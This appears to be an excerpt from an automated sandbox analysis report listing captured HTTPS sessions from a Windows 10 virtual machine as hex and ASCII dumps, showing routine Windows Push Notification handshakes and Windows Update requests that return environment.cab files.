                              2024-07-22 13:57:48 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                              Session IDSource IPSource PortDestination IPDestination Port
                              2192.168.2.64972740.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:57:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 53 54 46 37 34 45 6b 41 55 55 2b 63 36 76 79 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 62 66 31 33 64 34 38 37 37 35 33 30 65 31 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: STF74EkAUU+c6vyA.1Context: 11bf13d4877530e1
                              2024-07-22 13:57:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                              2024-07-22 13:57:56 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 53 54 46 37 34 45 6b 41 55 55 2b 63 36 76 79 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 62 66 31 33 64 34 38 37 37 35 33 30 65 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: STF74EkAUU+c6vyA.2Context: 11bf13d4877530e1<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 13:57:56 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 53 54 46 37 34 45 6b 41 55 55 2b 63 36 76 79 41 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 62 66 31 33 64 34 38 37 37 35 33 30 65 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: STF74EkAUU+c6vyA.3Context: 11bf13d4877530e1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 13:57:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 13:57:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 47 4a 4e 38 73 71 79 59 6b 6d 50 51 6d 6f 4f 41 58 6b 76 34 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: HGJN8sqyYkmPQmoOAXkv4w.0Payload parsing failed.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.64972852.165.165.26443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:57:58 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                              Host: slscr.update.microsoft.com
                              2024-07-22 13:57:58 UTC560INHTTP/1.1 200 OK
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Content-Type: application/octet-stream
                              Expires: -1
                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                              MS-CorrelationId: 6432058f-7414-45a3-bee1-cd148d193818
                              MS-RequestId: 50c2eeba-49fd-418b-aecc-bd5c575bf0db
                              MS-CV: C+rnSFjIvk+XbT0O.0
                              X-Microsoft-SLSClientCache: 2880
                              Content-Disposition: attachment; filename=environment.cab
                              X-Content-Type-Options: nosniff
                              Date: Mon, 22 Jul 2024 13:57:58 GMT
                              Connection: close
                              Content-Length: 24490
                              2024-07-22 13:57:58 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                              2024-07-22 13:57:58 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                              Session IDSource IPSource PortDestination IPDestination Port
                              4192.168.2.64978640.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:58:10 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 38 55 6e 41 37 77 68 63 44 6b 79 41 44 39 43 50 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 37 32 32 64 35 32 31 32 32 66 33 65 61 33 33 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: 8UnA7whcDkyAD9CP.1Context: f722d52122f3ea33
                              2024-07-22 13:58:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                              2024-07-22 13:58:10 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 38 55 6e 41 37 77 68 63 44 6b 79 41 44 39 43 50 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 37 32 32 64 35 32 31 32 32 66 33 65 61 33 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 8UnA7whcDkyAD9CP.2Context: f722d52122f3ea33<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 13:58:10 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 38 55 6e 41 37 77 68 63 44 6b 79 41 44 39 43 50 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 37 32 32 64 35 32 31 32 32 66 33 65 61 33 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 8UnA7whcDkyAD9CP.3Context: f722d52122f3ea33<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 13:58:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 13:58:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 54 76 35 70 79 79 45 63 62 6b 4b 74 41 72 30 52 6f 49 59 36 32 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: Tv5pyyEcbkKtAr0RoIY62A.0Payload parsing failed.


                              Session IDSource IPSource PortDestination IPDestination Port
                              5192.168.2.64981540.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:58:34 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 71 36 65 53 46 64 38 41 34 30 65 72 50 46 64 31 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 65 36 62 35 31 30 63 34 33 32 34 62 36 63 30 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: q6eSFd8A40erPFd1.1Context: ae6b510c4324b6c0
                              2024-07-22 13:58:34 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                              2024-07-22 13:58:34 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 71 36 65 53 46 64 38 41 34 30 65 72 50 46 64 31 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 65 36 62 35 31 30 63 34 33 32 34 62 36 63 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: q6eSFd8A40erPFd1.2Context: ae6b510c4324b6c0<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 13:58:34 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 71 36 65 53 46 64 38 41 34 30 65 72 50 46 64 31 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 65 36 62 35 31 30 63 34 33 32 34 62 36 63 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: q6eSFd8A40erPFd1.3Context: ae6b510c4324b6c0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 13:58:34 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 13:58:34 UTC58INData Raw: 4d 53 2d 43 56 3a 20 76 6f 57 5a 76 67 2b 52 6f 30 75 67 48 65 41 52 55 61 79 41 6c 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: voWZvg+Ro0ugHeARUayAlg.0Payload parsing failed.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.64981852.165.165.26443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:58:36 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                              Host: slscr.update.microsoft.com
                              2024-07-22 13:58:36 UTC560INHTTP/1.1 200 OK
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Content-Type: application/octet-stream
                              Expires: -1
                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                              MS-CorrelationId: c1972479-110c-4498-a24f-0d62e0db2017
                              MS-RequestId: af77e083-b725-4caa-9950-9728b8e54db1
                              MS-CV: ox/lcubyRU2sLs6c.0
                              X-Microsoft-SLSClientCache: 1440
                              Content-Disposition: attachment; filename=environment.cab
                              X-Content-Type-Options: nosniff
                              Date: Mon, 22 Jul 2024 13:58:35 GMT
                              Connection: close
                              Content-Length: 30005
                              2024-07-22 13:58:36 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                              2024-07-22 13:58:36 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                              Session IDSource IPSource PortDestination IPDestination Port
                              7192.168.2.64921340.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:59:02 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 6b 72 4a 33 43 30 61 49 55 47 72 7a 4a 33 66 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 66 31 33 32 39 38 33 30 35 34 37 32 38 64 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: AkrJ3C0aIUGrzJ3f.1Context: a2f132983054728d
                              2024-07-22 13:59:02 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
